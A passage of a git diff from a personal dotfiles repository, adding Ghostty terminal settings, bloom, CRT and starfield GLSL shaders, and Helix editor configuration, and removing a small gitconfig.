const vec3[24] samples = {
|
||||||
|
vec3(0.1693761725038636, 0.9855514761735895, 1),
|
||||||
|
vec3(-1.333070830962943, 0.4721463328627773, 0.7071067811865475),
|
||||||
|
vec3(-0.8464394909806497, -1.51113870578065, 0.5773502691896258),
|
||||||
|
vec3(1.554155680728463, -1.2588090085709776, 0.5),
|
||||||
|
vec3(1.681364377589461, 1.4741145918052656, 0.4472135954999579),
|
||||||
|
vec3(-1.2795157692199817, 2.088741103228784, 0.4082482904638631),
|
||||||
|
vec3(-2.4575847530631187, -0.9799373355024756, 0.3779644730092272),
|
||||||
|
vec3(0.5874641440200847, -2.7667464429345077, 0.35355339059327373),
|
||||||
|
vec3(2.997715703369726, 0.11704939884745152, 0.3333333333333333),
|
||||||
|
vec3(0.41360842451688395, 3.1351121305574803, 0.31622776601683794),
|
||||||
|
vec3(-3.167149933769243, 0.9844599011770256, 0.30151134457776363),
|
||||||
|
vec3(-1.5736713846521535, -3.0860263079123245, 0.2886751345948129),
|
||||||
|
vec3(2.888202648340422, -2.1583061557896213, 0.2773500981126146),
|
||||||
|
vec3(2.7150778983300325, 2.5745586041105715, 0.2672612419124244),
|
||||||
|
vec3(-2.1504069972377464, 3.2211410627650165, 0.2581988897471611),
|
||||||
|
vec3(-3.6548858794907493, -1.6253643308191343, 0.25),
|
||||||
|
vec3(1.0130775986052671, -3.9967078676335834, 0.24253562503633297),
|
||||||
|
vec3(4.229723673607257, 0.33081361055181563, 0.23570226039551587),
|
||||||
|
vec3(0.40107790291173834, 4.340407413572593, 0.22941573387056174),
|
||||||
|
vec3(-4.319124570236028, 1.159811599693438, 0.22360679774997896),
|
||||||
|
vec3(-1.9209044802827355, -4.160543952132907, 0.2182178902359924),
|
||||||
|
vec3(3.8639122286635708, -2.6589814382925123, 0.21320071635561041),
|
||||||
|
vec3(3.3486228404946234, 3.4331800232609, 0.20851441405707477),
|
||||||
|
vec3(-2.8769733643574344, 3.9652268864187157, 0.20412414523193154)
|
||||||
|
};
|
||||||
|
|
||||||
|
float lum(vec4 c) {
|
||||||
|
return 0.299 * c.r + 0.587 * c.g + 0.114 * c.b;
|
||||||
|
}
|
||||||
|
|
||||||
|
void mainImage(out vec4 fragColor, in vec2 fragCoord) {
|
||||||
|
vec2 uv = fragCoord.xy / iResolution.xy;
|
||||||
|
|
||||||
|
vec4 color = texture(iChannel0, uv);
|
||||||
|
|
||||||
|
vec2 step = vec2(1.414) / iResolution.xy;
|
||||||
|
|
||||||
|
for (int i = 0; i < 24; i++) {
|
||||||
|
vec3 s = samples[i];
|
||||||
|
vec4 c = texture(iChannel0, uv + s.xy * step);
|
||||||
|
float l = lum(c);
|
||||||
|
if (l > 0.2 && lum(color) < 0.75) {
|
||||||
|
color += l * s.z * c * 0.12; // reduced from 0.2 to balance glow intensity
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fragColor = clamp(color, 0.0, 1.12); // smooth highlighting
|
||||||
|
}
|
||||||
69
ghostty/.config/ghostty/config
Normal file
69
ghostty/.config/ghostty/config
Normal file
|
|
@ -0,0 +1,69 @@
|
||||||
|
# This is the configuration file for Ghostty.
|
||||||
|
#
|
||||||
|
# This template file has been automatically created at the following
|
||||||
|
# path since Ghostty couldn't find any existing config files on your system:
|
||||||
|
#
|
||||||
|
# /home/e/.config/ghostty/config
|
||||||
|
#
|
||||||
|
# The template does not set any default options, since Ghostty ships
|
||||||
|
# with sensible defaults for all options. Users should only need to set
|
||||||
|
# options that they want to change from the default.
|
||||||
|
#
|
||||||
|
# Run `ghostty +show-config --default --docs` to view a list of
|
||||||
|
# all available config options and their default values.
|
||||||
|
#
|
||||||
|
# Additionally, each config option is also explained in detail
|
||||||
|
# on Ghostty's website, at https://ghostty.org/docs/config.
|
||||||
|
|
||||||
|
# Config syntax crash course
|
||||||
|
# ==========================
|
||||||
|
# # The config file consists of simple key-value pairs,
|
||||||
|
# # separated by equals signs.
|
||||||
|
# font-family = Iosevka
|
||||||
|
# window-padding-x = 2
|
||||||
|
#
|
||||||
|
# # Spacing around the equals sign does not matter.
|
||||||
|
# # All of these are identical:
|
||||||
|
# key=value
|
||||||
|
# key= value
|
||||||
|
# key =value
|
||||||
|
# key = value
|
||||||
|
#
|
||||||
|
# # Any line beginning with a # is a comment. It's not possible to put
|
||||||
|
# # a comment after a config option, since it would be interpreted as a
|
||||||
|
# # part of the value. For example, this will have a value of "#123abc":
|
||||||
|
# background = #123abc
|
||||||
|
#
|
||||||
|
# # Empty values are used to reset config keys to default.
|
||||||
|
# key =
|
||||||
|
#
|
||||||
|
# # Some config options have unique syntaxes for their value,
|
||||||
|
# # which is explained in the docs for that config option.
|
||||||
|
# # Just for example:
|
||||||
|
# resize-overlay-duration = 4s 200ms
|
||||||
|
|
||||||
|
background-opacity = .95
|
||||||
|
background-blur = 15
|
||||||
|
|
||||||
|
keybind = global:ctrl+grave_accent=toggle_quick_terminal
|
||||||
|
|
||||||
|
custom-shader = ~/.config/ghostty/bloom.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/crt.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/starfield.glsl
|
||||||
|
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/bloom.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/galaxy.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/glitchy.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/glow-rgbsplit-twitchy.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/in-game-crt.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/matrix-hallway.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/negative.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/sparks-from-fire.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/starfield-colors.glsl
|
||||||
|
#custom-shader = ~/.config/ghostty/ghostty-shaders/starfield.glsl
|
||||||
|
|
||||||
|
|
||||||
|
keybind = shift+enter=text:\x1b\r
|
||||||
|
|
||||||
|
# Use zsh as default shell
|
||||||
|
command = /usr/bin/zsh
|
||||||
50
ghostty/.config/ghostty/config.default
Normal file
50
ghostty/.config/ghostty/config.default
Normal file
|
|
@ -0,0 +1,50 @@
|
||||||
|
# Fonts
|
||||||
|
font-family = "Fira Code"
|
||||||
|
font-family-bold = "Fira Code"
|
||||||
|
font-family-italic = "Maple Mono"
|
||||||
|
font-family-bold-italic = "Maple Mono"
|
||||||
|
font-family = "Symbols Nerd Font Mono"
|
||||||
|
font-size = 10
|
||||||
|
adjust-underline-position = 4
|
||||||
|
|
||||||
|
# Mouse
|
||||||
|
mouse-hide-while-typing = true
|
||||||
|
# mouse-scroll-multiplier = 1
|
||||||
|
|
||||||
|
# Theme
|
||||||
|
# theme = /home/folke/projects/tokyonight.nvim/extras/ghostty/tokyonight_night
|
||||||
|
cursor-invert-fg-bg = true
|
||||||
|
background-opacity = 0.9
|
||||||
|
window-theme = ghostty
|
||||||
|
|
||||||
|
# keybindings
|
||||||
|
keybind = clear
|
||||||
|
keybind = ctrl+shift+h=goto_split:left
|
||||||
|
keybind = ctrl+shift+j=goto_split:bottom
|
||||||
|
keybind = ctrl+shift+k=goto_split:top
|
||||||
|
keybind = ctrl+shift+l=goto_split:right
|
||||||
|
keybind = super+shift+t=new_tab
|
||||||
|
keybind = super+shift+h=previous_tab
|
||||||
|
keybind = super+shift+l=next_tab
|
||||||
|
keybind = super+shift+comma=move_tab:-1
|
||||||
|
keybind = super+shift+period=move_tab:1
|
||||||
|
keybind = super+shift+c=copy_to_clipboard
|
||||||
|
keybind = super+shift+v=paste_from_clipboard
|
||||||
|
keybind = super+shift+enter=new_split:auto
|
||||||
|
keybind = super+shift+i=inspector:toggle
|
||||||
|
keybind = super+shift+m=toggle_split_zoom
|
||||||
|
keybind = super+shift+r=reload_config
|
||||||
|
keybind = super+shift+s=write_screen_file:open
|
||||||
|
keybind = super+shift+w=close_surface
|
||||||
|
|
||||||
|
# Window
|
||||||
|
gtk-single-instance = true
|
||||||
|
gtk-tabs-location = bottom
|
||||||
|
gtk-wide-tabs = false
|
||||||
|
window-padding-y = 2,0
|
||||||
|
window-padding-balance = true
|
||||||
|
window-decoration = true
|
||||||
|
|
||||||
|
# Other
|
||||||
|
copy-on-select = clipboard
|
||||||
|
shell-integration-features = cursor,sudo,no-title
|
||||||
310
ghostty/.config/ghostty/crt.glsl
Normal file
310
ghostty/.config/ghostty/crt.glsl
Normal file
|
|
@ -0,0 +1,310 @@
|
||||||
|
// source: https://gist.github.com/qwerasd205/c3da6c610c8ffe17d6d2d3cc7068f17f
|
||||||
|
// credits: https://github.com/qwerasd205
|
||||||
|
//==============================================================
|
||||||
|
//
|
||||||
|
// [CRTS] PUBLIC DOMAIN CRT-STYLED SCALAR by Timothy Lottes
|
||||||
|
//
|
||||||
|
// [+] Adapted with alterations for use in Ghostty by Qwerasd.
|
||||||
|
// For more information on changes, see comment below license.
|
||||||
|
//
|
||||||
|
//==============================================================
|
||||||
|
//
|
||||||
|
// LICENSE = UNLICENSE (aka PUBLIC DOMAIN)
|
||||||
|
//
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// This is free and unencumbered software released into the
|
||||||
|
// public domain.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// Anyone is free to copy, modify, publish, use, compile, sell,
|
||||||
|
// or distribute this software, either in source code form or as
|
||||||
|
// a compiled binary, for any purpose, commercial or
|
||||||
|
// non-commercial, and by any means.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// In jurisdictions that recognize copyright laws, the author or
|
||||||
|
// authors of this software dedicate any and all copyright
|
||||||
|
// interest in the software to the public domain. We make this
|
||||||
|
// dedication for the benefit of the public at large and to the
|
||||||
|
// detriment of our heirs and successors. We intend this
|
||||||
|
// dedication to be an overt act of relinquishment in perpetuity
|
||||||
|
// of all present and future rights to this software under
|
||||||
|
// copyright law.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
|
||||||
|
// KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
|
||||||
|
// WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
|
||||||
|
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE
|
||||||
|
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
|
||||||
|
// AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
|
||||||
|
// OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
|
||||||
|
// DEALINGS IN THE SOFTWARE.
|
||||||
|
//--------------------------------------------------------------
|
||||||
|
// For more information, please refer to
|
||||||
|
// <http://unlicense.org/>
|
||||||
|
//==============================================================
|
||||||
|
|
||||||
|
// This shader is a modified version of the excellent
|
||||||
|
// FixingPixelArtFast by Timothy Lottes on Shadertoy.
|
||||||
|
//
|
||||||
|
// The original shader can be found at:
|
||||||
|
// https://www.shadertoy.com/view/MtSfRK
|
||||||
|
//
|
||||||
|
// Modifications have been made to reduce the verbosity,
|
||||||
|
// and many of the comments have been removed / reworded.
|
||||||
|
// Additionally, the license has been moved to the top of
|
||||||
|
// the file, and can be read above. I (Qwerasd) choose to
|
||||||
|
// release the modified version under the same license.
|
||||||
|
|
||||||
|
// The appearance of this shader can be altered
|
||||||
|
// by adjusting the parameters defined below.
|
||||||
|
|
||||||
|
// "Scanlines" per real screen pixel.
|
||||||
|
// e.g. SCALE 0.5 means each scanline is 2 pixels.
|
||||||
|
// Recommended values:
|
||||||
|
// o High DPI displays: 0.33333333
|
||||||
|
// - Low DPI displays: 0.66666666
|
||||||
|
#define SCALE 0.33333333
|
||||||
|
|
||||||
|
// "Tube" warp
|
||||||
|
#define CRTS_WARP 1
|
||||||
|
|
||||||
|
// Darkness of vignette in corners after warping
|
||||||
|
// 0.0 = completely black
|
||||||
|
// 1.0 = no vignetting
|
||||||
|
#define MIN_VIN 0.5
|
||||||
|
|
||||||
|
// Try different masks
|
||||||
|
// #define CRTS_MASK_GRILLE 1
|
||||||
|
// #define CRTS_MASK_GRILLE_LITE 1
|
||||||
|
// #define CRTS_MASK_NONE 1
|
||||||
|
#define CRTS_MASK_SHADOW 1
|
||||||
|
|
||||||
|
// Scanline thinness
|
||||||
|
// 0.50 = fused scanlines
|
||||||
|
// 0.70 = recommended default
|
||||||
|
// 1.00 = thinner scanlines (too thin)
|
||||||
|
#define INPUT_THIN 0.75
|
||||||
|
|
||||||
|
// Horizontal scan blur
|
||||||
|
// -3.0 = pixely
|
||||||
|
// -2.5 = default
|
||||||
|
// -2.0 = smooth
|
||||||
|
// -1.0 = too blurry
|
||||||
|
#define INPUT_BLUR -2.75
|
||||||
|
|
||||||
|
// Shadow mask effect, ranges from,
|
||||||
|
// 0.25 = large amount of mask (not recommended, too dark)
|
||||||
|
// 0.50 = recommended default
|
||||||
|
// 1.00 = no shadow mask
|
||||||
|
#define INPUT_MASK 0.65
|
||||||
|
|
||||||
|
// Decode one sRGB channel to linear light (IEC 61966-2-1 EOTF):
// linear segment below the 0.04045 knee, power curve above it.
float FromSrgb1(float c) {
  if (c <= 0.04045) {
    return c * (1.0 / 12.92);
  }
  return pow(c * (1.0 / 1.055) + (0.055 / 1.055), 2.4);
}
|
||||||
|
// Decode an sRGB color to linear light, channel by channel.
vec3 FromSrgb(vec3 c) {
  return vec3(
      FromSrgb1(c.r),
      FromSrgb1(c.g),
      FromSrgb1(c.b));
}
|
||||||
|
|
||||||
|
// Sample the input texture at `uv` and convert the sRGB-encoded texel
// to linear light for filtering.
// NOTE(review): iChannel0 is the Shadertoy/terminal-provided input
// channel — defined by the host environment, not this file.
vec3 CrtsFetch(vec2 uv) {
  return FromSrgb(texture(iChannel0, uv.xy).rgb);
}
|
||||||
|
|
||||||
|
#define CrtsRcpF1(x) (1.0/(x))
|
||||||
|
#define CrtsSatF1(x) clamp((x),0.0,1.0)
|
||||||
|
|
||||||
|
// Largest of three scalars.
float CrtsMax3F1(float a, float b, float c) {
  return max(max(a, b), c);
}
|
||||||
|
|
||||||
|
// Compute the two coefficients of the rational tone curve applied at the
// end of CrtsFilter. Compensates exposure for light lost to scanline
// thinness (`thin`) and the phosphor mask (`mask`) so that mid-gray
// (0.18) maps back to mid-gray after filtering.
vec2 CrtsTone(
    float thin,
    float mask) {
#ifdef CRTS_MASK_NONE
  // No mask is applied, so no mask darkening to compensate for.
  mask = 1.0;
#endif

#ifdef CRTS_MASK_GRILLE_LITE
  // Normal R mask is {1.0,mask,mask}
  // LITE R mask is {mask,1.0,1.0}
  // -> only half the mask amount needs compensating.
  mask = 0.5 + mask * 0.5;
#endif

  vec2 ret;
  // Target output level for mid-gray given scanline/mask attenuation.
  float midOut = 0.18 / ((1.5 - thin) * (0.5 * mask + 0.5));
  float pMidIn = 0.18;
  // Solve the rational curve p' = p / (p*ret.x + ret.y) so that
  // pMidIn maps to midOut and 1.0 maps to 1.0.
  ret.x = ((-pMidIn) + midOut) / ((1.0 - pMidIn) * midOut);
  ret.y = ((-pMidIn) * midOut + pMidIn) / (midOut * (-pMidIn) + midOut);

  return ret;
}
|
||||||
|
|
||||||
|
// Per-pixel phosphor mask color. `pos` is the output pixel coordinate,
// `dark` (INPUT_MASK) is the attenuation applied to masked subpixels.
// Exactly one CRTS_MASK_* macro must be defined above; otherwise this
// function falls off the end without returning (undefined result).
vec3 CrtsMask(vec2 pos, float dark) {
#ifdef CRTS_MASK_GRILLE
  // Aperture grille: vertical RGB stripes — one bright channel per column.
  vec3 m = vec3(dark, dark, dark);
  float x = fract(pos.x * (1.0 / 3.0));
  if (x < (1.0 / 3.0)) m.r = 1.0;
  else if (x < (2.0 / 3.0)) m.g = 1.0;
  else m.b = 1.0;
  return m;
#endif

#ifdef CRTS_MASK_GRILLE_LITE
  // Lighter grille: darken one channel per column instead of two.
  vec3 m = vec3(1.0, 1.0, 1.0);
  float x = fract(pos.x * (1.0 / 3.0));
  if (x < (1.0 / 3.0)) m.r = dark;
  else if (x < (2.0 / 3.0)) m.g = dark;
  else m.b = dark;
  return m;
#endif

#ifdef CRTS_MASK_NONE
  return vec3(1.0, 1.0, 1.0);
#endif

#ifdef CRTS_MASK_SHADOW
  // Shadow mask: the stripe pattern is sheared per row and repeats
  // every 6 columns, approximating a staggered triad layout.
  pos.x += pos.y * 3.0;
  vec3 m = vec3(dark, dark, dark);
  float x = fract(pos.x * (1.0 / 6.0));
  if (x < (1.0 / 3.0)) m.r = 1.0;
  else if (x < (2.0 / 3.0)) m.g = 1.0;
  else m.b = 1.0;
  return m;
#endif
}
|
||||||
|
|
||||||
|
// Core CRT filter: optional tube warp + vignette, a 4x2 texel fetch,
// gaussian horizontal blur, sine-window scanlines, phosphor mask, and a
// rational tone curve. Returns the filtered linear-light color for the
// output pixel at `ipos`.
// NOTE(review): `rcpOutputSize` is accepted but never read in this body.
vec3 CrtsFilter(
    vec2 ipos,                      // output pixel position
    vec2 inputSizeDivOutputSize,    // scale used when warp is disabled
    vec2 halfInputSize,             // half the virtual input resolution
    vec2 rcpInputSize,              // 1 / input resolution
    vec2 rcpOutputSize,             // 1 / output resolution (unused here)
    vec2 twoDivOutputSize,          // 2 / output resolution
    float inputHeight,              // vignette strength scale
    vec2 warp,                      // tube warp amounts (x, y)
    float thin,                     // scanline thinness (INPUT_THIN)
    float blur,                     // gaussian blur exponent (INPUT_BLUR)
    float mask,                     // mask darkness (INPUT_MASK)
    vec2 tone                       // tone-curve coefficients (CrtsTone)
) {
  // Optional apply warp
  vec2 pos;
#ifdef CRTS_WARP
  // Convert to {-1 to 1} range
  pos = ipos * twoDivOutputSize - vec2(1.0, 1.0);

  // Distort pushes image outside {-1 to 1} range
  pos *= vec2(
      1.0 + (pos.y * pos.y) * warp.x,
      1.0 + (pos.x * pos.x) * warp.y);

  // TODO: Vignette needs optimization
  float vin = 1.0 - (
      (1.0 - CrtsSatF1(pos.x * pos.x)) * (1.0 - CrtsSatF1(pos.y * pos.y)));
  vin = CrtsSatF1((-vin) * inputHeight + inputHeight);

  // Leave in {0 to inputSize}
  pos = pos * halfInputSize + halfInputSize;
#else
  pos = ipos * inputSizeDivOutputSize;
#endif

  // Snap to center of first scanline
  float y0 = floor(pos.y - 0.5) + 0.5;
  // Snap to center of one of four pixels
  float x0 = floor(pos.x - 1.5) + 0.5;

  // Initial UV position
  vec2 p = vec2(x0 * rcpInputSize.x, y0 * rcpInputSize.y);
  // Fetch 4 nearest texels from 2 nearest scanlines (A = upper, B = lower)
  vec3 colA0 = CrtsFetch(p);
  p.x += rcpInputSize.x;
  vec3 colA1 = CrtsFetch(p);
  p.x += rcpInputSize.x;
  vec3 colA2 = CrtsFetch(p);
  p.x += rcpInputSize.x;
  vec3 colA3 = CrtsFetch(p);
  p.y += rcpInputSize.y;
  vec3 colB3 = CrtsFetch(p);
  p.x -= rcpInputSize.x;
  vec3 colB2 = CrtsFetch(p);
  p.x -= rcpInputSize.x;
  vec3 colB1 = CrtsFetch(p);
  p.x -= rcpInputSize.x;
  vec3 colB0 = CrtsFetch(p);

  // Vertical filter:
  // scanline intensity uses a raised-cosine window; its integral is
  // compensated later via the tone curve.
  float off = pos.y - y0;
  float pi2 = 6.28318530717958;
  float hlf = 0.5;
  float scanA = cos(min(0.5, off * thin) * pi2) * hlf + hlf;
  float scanB = cos(min(0.5, (-off) * thin + thin) * pi2) * hlf + hlf;

  // Horizontal kernel is a simple gaussian filter over the 4 taps
  float off0 = pos.x - x0;
  float off1 = off0 - 1.0;
  float off2 = off0 - 2.0;
  float off3 = off0 - 3.0;
  float pix0 = exp2(blur * off0 * off0);
  float pix1 = exp2(blur * off1 * off1);
  float pix2 = exp2(blur * off2 * off2);
  float pix3 = exp2(blur * off3 * off3);
  // Normalization factor so the 4 gaussian weights sum to 1.
  float pixT = CrtsRcpF1(pix0 + pix1 + pix2 + pix3);

#ifdef CRTS_WARP
  // Get rid of wrong pixels on edge (vignette folded into normalization)
  pixT *= max(MIN_VIN, vin);
#endif

  scanA *= pixT;
  scanB *= pixT;

  // Apply horizontal and vertical filters
  vec3 color =
      (colA0 * pix0 + colA1 * pix1 + colA2 * pix2 + colA3 * pix3) * scanA +
      (colB0 * pix0 + colB1 * pix1 + colB2 * pix2 + colB3 * pix3) * scanB;

  // Apply phosphor mask
  color *= CrtsMask(ipos, mask);

  // Tonal control, start by protecting from /0
  float peak = max(1.0 / (256.0 * 65536.0),
      CrtsMax3F1(color.r, color.g, color.b));
  // Compute the ratios of {R,G,B}
  vec3 ratio = color * CrtsRcpF1(peak);
  // Apply tonal curve to peak value
  peak = peak * CrtsRcpF1(peak * tone.x + tone.y);
  // Reconstruct color
  return ratio * peak;
}
|
||||||
|
|
||||||
|
// Encode one linear-light channel back to sRGB:
// linear segment below the 0.0031308 knee, power curve above it.
float ToSrgb1(float c) {
  if (c < 0.0031308) {
    return c * 12.92;
  }
  return 1.055 * pow(c, 0.41666) - 0.055;
}
|
||||||
|
// Encode a linear-light color to sRGB, channel by channel.
vec3 ToSrgb(vec3 c) {
  return vec3(
      ToSrgb1(c.r),
      ToSrgb1(c.g),
      ToSrgb1(c.b));
}
|
||||||
|
|
||||||
|
// Shader entry point: run the CRT filter at the configured virtual
// resolution (iResolution * SCALE), then encode linear -> sRGB.
// NOTE(review): fragColor.a is never written here — the host presumably
// ignores or pre-fills alpha; confirm against the terminal's shader API.
void mainImage(out vec4 fragColor, in vec2 fragCoord) {
  float aspect = iResolution.x / iResolution.y;
  fragColor.rgb = CrtsFilter(
      fragCoord.xy,
      vec2(1.0),                                // inputSize/outputSize (unused with CRTS_WARP)
      iResolution.xy * SCALE * 0.5,             // half virtual input size
      1.0 / (iResolution.xy * SCALE),           // 1 / virtual input size
      1.0 / iResolution.xy,                     // 1 / output size
      2.0 / iResolution.xy,                     // 2 / output size
      iResolution.y,                            // vignette scale
      vec2(1.0 / (50.0 * aspect), 1.0 / 50.0),  // tube warp, aspect-corrected
      INPUT_THIN,
      INPUT_BLUR,
      INPUT_MASK,
      CrtsTone(INPUT_THIN, INPUT_MASK)
  );

  // Linear to SRGB for output.
  fragColor.rgb = ToSrgb(fragColor.rgb);
}
|
||||||
1
ghostty/.config/ghostty/ghostty-shaders
Submodule
1
ghostty/.config/ghostty/ghostty-shaders
Submodule
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit a17573fb254e618f92a75afe80faa31fd5e09d6f
|
||||||
135
ghostty/.config/ghostty/starfield.glsl
Normal file
135
ghostty/.config/ghostty/starfield.glsl
Normal file
|
|
@ -0,0 +1,135 @@
|
||||||
|
// transparent background
|
||||||
|
const bool transparent = false;
|
||||||
|
|
||||||
|
// terminal contents luminance threshold to be considered background (0.0 to 1.0)
|
||||||
|
const float threshold = 0.15;
|
||||||
|
|
||||||
|
// divisions of grid
|
||||||
|
const float repeats = 30.;
|
||||||
|
|
||||||
|
// number of layers
|
||||||
|
const float layers = 21.;
|
||||||
|
|
||||||
|
// star colors
|
||||||
|
const vec3 white = vec3(1.0); // Set star color to pure white
|
||||||
|
|
||||||
|
// Relative luminance with Rec. 709 channel weights.
float luminance(vec3 color) {
  const vec3 lumaWeights = vec3(0.2126, 0.7152, 0.0722);
  return dot(color, lumaWeights);
}
|
||||||
|
|
||||||
|
// 2D -> 1D hash: returns a pseudo-random float in [0,1) for point `p`.
// Standard magic-constant shader hash; the exact operation order IS the
// function's behavior — do not reorder.
float N21(vec2 p) {
  p = fract(p * vec2(233.34, 851.73));
  p += dot(p, p + 23.45);
  return fract(p.x * p.y);
}
|
||||||
|
|
||||||
|
// 2D -> 2D hash built from two chained N21 evaluations.
vec2 N22(vec2 p) {
  float first = N21(p);
  float second = N21(p + first);
  return vec2(first, second);
}
|
||||||
|
|
||||||
|
// Diagonal 2x2 scaling matrix (column-major constructor).
mat2 scale(vec2 s) {
  return mat2(
      s.x, 0.0,
      0.0, s.y);
}
|
||||||
|
|
||||||
|
// 2D Noise based on Morgan McGuire
|
||||||
|
// 2D value noise based on Morgan McGuire's implementation: hash the four
// lattice corners around `st` and blend with a cubic Hermite weight.
float noise(in vec2 st) {
  vec2 i = floor(st);
  vec2 f = fract(st);

  // Four corners in 2D of a tile
  float a = N21(i);
  float b = N21(i + vec2(1.0, 0.0));
  float c = N21(i + vec2(0.0, 1.0));
  float d = N21(i + vec2(1.0, 1.0));

  // Smooth Interpolation
  vec2 u = f * f * (3.0 - 2.0 * f); // Cubic Hermite Curve

  // Mix 4 corners percentages (bilinear blend rewritten as one expression)
  return mix(a, b, u.x) +
      (c - a) * u.y * (1.0 - u.x) +
      (d - b) * u.x * u.y;
}
|
||||||
|
|
||||||
|
// Multiplicative multi-octave value noise. Each octave samples `noise` at
// an increasing frequency (scaled by `pscale`) and multiplies into the
// accumulator; bails out early once the product is negligible.
//
// BUG FIX: the loop counter was declared without an initializer
// ("for (int l; ...)"), which leaves it with an undefined value per the
// GLSL spec — the octave count was driver-dependent. Initialize to 0.
float perlin2(vec2 uv, int octaves, float pscale) {
  float col = 1.;
  float initScale = 4.;
  for (int l = 0; l < octaves; l++) {
    float val = noise(uv * initScale);
    // Early out: product has decayed to effectively zero.
    if (col <= 0.01) {
      col = 0.;
      break;
    }
    // Bias and halve the octave sample before folding it in.
    val -= 0.01;
    val *= 0.5;
    col *= val;
    initScale *= pscale; // next octave frequency
  }
  return col;
}
|
||||||
|
|
||||||
|
// One layer of the starfield. `offset` staggers layers in time; each
// layer zooms from the screen center, reseeds every cycle, and places one
// star per grid cell. Returns the layer's additive color contribution.
vec3 stars(vec2 uv, float offset) {
  // Layer phase: fract() animates the zoom, floor() reseeds each cycle.
  float timeScale = -(iTime + offset) / layers;
  float trans = fract(timeScale);
  float newRnd = floor(timeScale);
  vec3 col = vec3(0.);

  // Translate uv then scale for center (zoom about screen center)
  uv -= vec2(0.5);
  uv = scale(vec2(trans)) * uv;
  uv += vec2(0.5);

  // Create square aspect ratio
  uv.x *= iResolution.x / iResolution.y;

  // Create boxes (grid of `repeats` cells)
  uv *= repeats;

  // Get position (integer cell id)
  vec2 ipos = floor(uv);

  // Return uv as 0 to 1 (position within the cell)
  uv = fract(uv);

  // Per-cell random star position (kept off cell edges) and size
  vec2 rndXY = N22(newRnd + ipos * (offset + 1.)) * 0.9 + 0.05;
  float rndSize = N21(ipos) * 100. + 200.;

  // Inverse-square falloff around the star position -> point sparkle
  vec2 j = (rndXY - uv) * rndSize;
  float sparkle = 1. / dot(j, j);

  // Set stars to be pure white
  col += white * sparkle;

  // Fade the layer out at end of cycle to hide the reseed pop
  col *= smoothstep(1., 0.8, trans);
  return col; // Return pure white stars only
}
|
||||||
|
|
||||||
|
// Starfield entry point: accumulate all star layers, then composite with
// the terminal texture — stars show only where the terminal content is
// darker than `threshold` (or everywhere when `transparent` is set).
//
// BUG FIX: "1 - step(...)" mixed an int literal with a float expression.
// Desktop GLSL implicitly converts, but GLSL ES rejects it; use "1.0".
void mainImage(out vec4 fragColor, in vec2 fragCoord)
{
  // Normalized pixel coordinates (from 0 to 1)
  vec2 uv = fragCoord / iResolution.xy;

  vec3 col = vec3(0.);

  for (float i = 0.; i < layers; i++) {
    col += stars(uv, i);
  }

  // Sample the terminal screen texture including alpha channel
  vec4 terminalColor = texture(iChannel0, uv);

  if (transparent) {
    col += terminalColor.rgb;
  }

  // Make a mask that is 1.0 where the terminal content is background
  // (luminance below threshold), 0.0 where there is visible content.
  float mask = 1.0 - step(threshold, luminance(terminalColor.rgb));

  vec3 blendedColor = mix(terminalColor.rgb, col, mask);

  // Apply terminal's alpha to control overall opacity
  fragColor = vec4(blendedColor, terminalColor.a);
}
|
||||||
|
|
@ -1,8 +0,0 @@
|
||||||
[user]
|
|
||||||
name = rpriven
|
|
||||||
email = rob.pratt@tutanota.com
|
|
||||||
[init]
|
|
||||||
defaultBranch = main
|
|
||||||
|
|
||||||
[core]
|
|
||||||
editor = nvim
|
|
||||||
20
helix/.config/helix/config.toml
Normal file
20
helix/.config/helix/config.toml
Normal file
|
|
@ -0,0 +1,20 @@
|
||||||
|
theme = "doom_acario_dark"
|
||||||
|
# theme = "tokyonight_storm"
|
||||||
|
|
||||||
|
[editor]
|
||||||
|
line-number = "relative"
|
||||||
|
mouse = false
|
||||||
|
bufferline = "multiple"
|
||||||
|
gutters = ["diagnostics", "spacer", "line-numbers", "spacer", "diff"]
|
||||||
|
|
||||||
|
[editor.cursor-shape]
|
||||||
|
insert = "bar"
|
||||||
|
normal = "block"
|
||||||
|
select = "underline"
|
||||||
|
|
||||||
|
[editor.file-picker]
|
||||||
|
hidden = false
|
||||||
|
|
||||||
|
[keys.normal]
|
||||||
|
esc = ["collapse_selection", "keep_primary_selection"]
|
||||||
|
|
||||||
66
helix/.config/helix/languages.toml
Normal file
66
helix/.config/helix/languages.toml
Normal file
|
|
@ -0,0 +1,66 @@
|
||||||
|
# ~/.config/helix/languages.toml
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "python"
|
||||||
|
language-servers = ["pylsp"]
|
||||||
|
auto-format = true
|
||||||
|
|
||||||
|
[language-server.pylsp.config.pylsp.plugins.pycodestyle]
|
||||||
|
maxLineLength = 100
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "bash"
|
||||||
|
language-servers = ["bash-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdown"
|
||||||
|
language-servers = ["marksman"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
